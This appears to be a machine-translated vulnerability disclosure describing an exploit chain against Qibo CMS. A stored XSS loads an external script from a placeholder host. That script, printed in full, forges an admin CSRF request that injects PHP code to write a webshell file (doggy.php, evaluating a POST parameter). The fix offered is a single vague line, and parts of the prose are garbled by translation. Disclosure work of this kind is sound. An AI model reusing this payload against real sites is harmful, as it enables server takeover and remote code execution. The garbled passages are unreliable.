Qibo cms won qibo cms with the power of combining three 0day backend getshells with the front-end storage-type xss + background CSRF + with little threat and negligible impact, although it is not a serious vulnerability, the problems and breakthroughs encountered in the middle of the process are comforting. Please take a look at the official website. -- by pandas
Some time ago, when Xidu broke qibocms 0day, he saw the code of qibo cms and found several getshells in the background. There were a lot of getshells in the background, the vendor has no influence on the positive and negligible attitude. Basically, all forms submitted in the background have CSRF. If there is a front-end getshell, the power will increase a lot, so I went to the front-end black box to dig out an xss. in this way, you can use getshell. 1. storage Type XSS location: member center-> omnipotent form-> Publish information-> moderator application: The submission value of postdb [sortname] [] is not filtered, but the length is limited, but this length is enough to write <script src = "http://xxx.com/1.js">, after submission, the administrator needs to go to the background and Choose Shortcut> omnipotent form model management> moderator Application> Management> View Details. the slash is replaced, so the backslash <script src = "http: \ xxx.com \ 1.js"> is used. 1. js is the internal file that we need to load externally. Rong. here, you need to submit a form, which is located in the background system function-> plug-in management-> points Introduction Management (jfadmin_mod). Modify the points to introduce any of them, insert $ {@ phpinfo () ;}in the title or content ();}. This can cause code execution. Therefore, you can submit the code for writing a php file. 1. The js content is as follows:
thisTHost = top.location.hostname;thisTHost = "http://"+thisTHost+"/v7/admin/index.php?lfj=jfadmin&action=addjf";function PostSubmit(url) { var postUrl = url; var ExportForm = document.createElement("FORM"); document.body.appendChild(ExportForm); ExportForm.method = "POST"; var newElement = document.createElement("input"); newElement.setAttribute("name", "title"); var newElement2 = document.createElement("input"); newElement2.setAttribute("name", "fid"); var newElement3 = document.createElement("input"); newElement3.setAttribute("name", "list"); var newElement4 = document.createElement("input"); newElement4.setAttribute("name", "content"); ExportForm.appendChild(newElement); ExportForm.appendChild(newElement2); ExportForm.appendChild(newElement3); ExportForm.appendChild(newElement4); newElement.value = "${@fwrite(fopen('doggy.php', 'w+'), '<?php assert($_POST[aaa]);?>')}"; newElement2.value = 1; newElement3.value = 1; newElement4.value = 1; ExportForm.action = postUrl; ExportForm.submit(); };PostSubmit(thisTHost);
There are two parts to prove: 1. User Part 1) login 2) Write xss 2. Administrator part view the application in the website/admin directory will add doggy. php content:
Solution:
Repair with emphasis